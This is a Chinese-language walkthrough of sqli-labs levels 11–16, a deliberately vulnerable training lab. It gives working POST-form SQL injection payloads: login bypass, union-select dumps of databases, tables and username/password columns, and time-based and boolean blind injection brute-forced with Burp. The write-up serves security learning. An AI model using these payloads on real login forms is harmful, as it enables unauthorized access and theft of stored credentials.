sqli-labs（11-16关）

MySQL查询语句：

　　查库：select schema_name from information_schema.schemata;

　　查表：select table_name from information_schema.tables where table_schema='security';（以security表为例）

　　查列：select column_name from information_schema.columns where table_name='users';

　　查字段：select username,password from security.users;

第十一关（Less-11）：单引号注入

　　1.首先输入用户名和密码均为admin进行登录，显示登录成功和相关的sql语句以及登录名和密码，如图所示

　　2.打开Burp Loader进行抓包分析，打开代理，重新登录，进行抓包

　　3.将uname、passwd和submit进行复制，粘贴到如图所示位置，然后执行

　　4.执行之后，显示成功。

　　5.将uname=admin&passwd=admin&submit=Submit修改为uname=admin'&passwd=admin&submit=Submit，再次执行，如图出现语法错误，说明存在注入漏洞

　　6.将 uname=admin'&passwd=admin&submit=Submit更改为uname='&passwd=admin&submit=Submit，再次执行，如图还是存在错误，存在注入漏洞

　　7. 将uname='&passwd=admin&submit=Submit更改为uname=admin' or 1=1#&passwd=admin&submit=Submit，登录成功，验证存在注入漏洞（#为注释符，不可用--+）

　　8.输入uname=n'or 1=1#&passwd=admin&submit=Submit，执行显示成功，则构造出初始语法为这样儿

　　9.使用order by猜解列数，输入uname=n'order by 3#&passwd=admin&submit=Submit，显示错误

　　10.将3改为2，无错误，说明有两列

　　11.使用联合查询语句union select，得出回显位置1和2

　　12.爆破库，输入uname=n'union select 1,schema_name from information_schema.schemata limit 0,1#&passwd=admin&submit=Submit，得到数据库information_schema

　　13.将limit0,1改为limit1,1即可得到第二个数据库，后面的以此类推

　　14.输入uname=n'union select 1,group_concat(schema_name) from information_schema.schemata#&passwd=admin&submit=Submit，爆破出所有库

　　15.以security库为例，爆破表、列、字段。输入uname=n'union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=admin&submit=Submit，爆破出security库中的所有表信息

　　16.输入uname=n'union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=admin&submit=Submit，爆破出users表中的所有列信息

　　17.输入uname=n'union select 1,group_concat(username) from security.users#&passwd=admin&submit=Submit，爆破出username字段的所有信息

　　18.输入uname=n'union select 1,group_concat(concat_ws(0x7e,username,password)) from security.users#&passwd=admin&submit=Submit一次性爆破出username,password字段的信息

第十二关（Less-12）：双引号注入

　　1.同Less-11相同的方法进行抓包，拿到数据

　　2.将uname、passwd和submit进行复制，粘贴到如图所示位置，然后执行，登陆成功，显示用户名和密码

　　3.查询其是否存在注入漏洞，输入uname=admin'or 1=1#&passwd=admin&submit=Submit，显示登录失败，但是无其他报错信息，存在注入漏洞

　　4.将单引号更改为双引号，uname=admin" or 1=1#&passwd=admin&submit=Submit，登陆失败，出现报错信息

　　5.输入uname=admin") or1=1#&passwd=admin&submit=Submit，登陆成功，说明构造的初始语法如此

　　6.其余爆破库、表、列 、字段的操作均与Less-11相同

第十三关（Less-13）：

　　1.输入username和password进行提交，返回信息表示登录成功

　　2.像Less-11和Less-12一样抓包获取Post的内容uname=admin&passwd=admin&submit=Submit，执行，显示登陆成功

　　3.将admin改为ain再次登录，显示登录失败

　　4.将Post内容uname=ain&passwd=admin&submit=Submit修改为uname=ain' or 1=1#&passwd=admin&submit=Submit并使用or语句进行构造。提示失败并出现报错，说明存在注入漏洞。

　　5.将构造的Post内容进行修改，改为uname=ain') or 1=1#&passwd=admin&submit=Submit，执行。返回成功登录。

　　6.此时我们使用union select进行回显位置的查找，输入uname=ain') or union select 1,2#&passwd=admin&submit=Submit。返回结果为失败

　　7.在这里我们使用盲注。使用if语句，进行逐步猜测数据库名称的长度。首先输入uname=ain') or if(length(database())>1,1,sleep(5))#&passwd=admin&submit=Submit。立刻回显正常。说明此时数据库的长度大于1成立。将大于1改为大于10，则会休眠5s。

　　8.我们当前的实验是以security库为例，此库的长度为8（已知）。输入uname=ain') or if(length(database())>=8,1,sleep(5))#&passwd=admin&submit=Submit。返回成功并且返回速度很快。故最终猜解到当前数据库字符长度为8。

　　9.接下来判断当前数据库的第一个字母，使用left函数，与if函数的用法类似。输入uname=ain') or left(database(),1)>'a'#&passwd=admin&submit=Submit。判断当前数据库的首字母是否比a大，若大，则返回1。返回结果成功，说明首字母比a大。

　　10.将database()进行替换，换为select schema_name from information_schema.schemata limit 0,1进行一位一位的查询。返回成功。则可以通过这样的方法查询出数据库中的所有信息，也可以通过这样的方法查询出表，列，字段信息。

　　11.使用BurpLoader进行破解库、表、列、字段。使用大于a显示成功，小于或者等于a均为失败。

　　12.打开代理，进行重新发送。抓包。将抓到的包发送至暴力破解模块。在暴力破解模块清楚当前的关键字。

　　13.将a设置为关键字，添加美元符号。然后选择payloads，改为暴力破解模式，设置Payloads和Options（可以将线程设置为10）。然后开始暴力破解。

   

　　14.根据长度判断第一位的字母。发现i字母的长度与其他长度不同，查看返回结果可知i时返回成功。故猜解到第一位是i

　　15.进行第二位的猜解。与第一位的爆破猜解方法相同。

　　16.发现n的长度与其他长度不同。返回数据中也出现成功的图片。故猜解第二位是n。其余位猜解方法相同。

第十四关（Less-14）：

　　1.根据提示输入username和password，点击提交。返回成功，但没有回显信息。与Less-13对比可知，不同的地方是Less-13使用的是单引号，而Less-14使用的是双引号。

　　2.与Less-13的方法相同进行抓包得到post数据uname=admin&passwd=admin&submit=Submit，登录会显示登录成功

　　3.对语法进行构造。根据与Less-13的不同之处进行构造，得出uname=admin" or 1=1#&passwd=admin&submit=Submit，此时返回成功

　　4.使用length语句进行长度的猜解（已知当前数据库的字符长度为8）。输入uname=admin" or length(database())='8'#&passwd=admin&submit=Submit.显示成功

　　5.使用left函数进行首字母的猜解判断。uname=ain" or left((select schema_name from information_schema.schemata limit 0,1),1)>'a'#&passwd=admin&submit=Submit。返回成功。

　　6.改为等于a，返回失败。说明首字母大于a

　　7.接下来跟Less-13的内容相同，可以使用left函数进行一个一个的猜解，也可以使用BurpLoader进行每一位的猜解。

第十五关（Less-15）：

　　1.根据提示输入username和password，点击提交。显示登陆成功，但没有回显值。

　　2.与Less-13和Less-14进行比较得出，Less-15是用单引号

　　3.用与Less-13和Less-14相同的方法得到post数据，进行猜想构造，得出uname=admin&passwd=a' or 1=1#&submit=Submit。显示登陆成功

　　4.接下来，采用与Less-13和Less-14相同的方法进行盲注猜解。此处省略，可参考Less-13和Less-14。

第十六关（Less-16）： 

　　1.根据提示输入username和password。显示成功。

　　2.与Less-13、Lss-14和Less-15操作相同。得到post内的数据。uname=admin&passwd=admin&submit=Submit。显示成功。

　　3.Less-16与Less-13、Less-14和Less-15不同的是，使用双引号括号包裹数据。则同样采用布尔盲注进行猜解。与Less-13、Less-14和Less-15操作相同。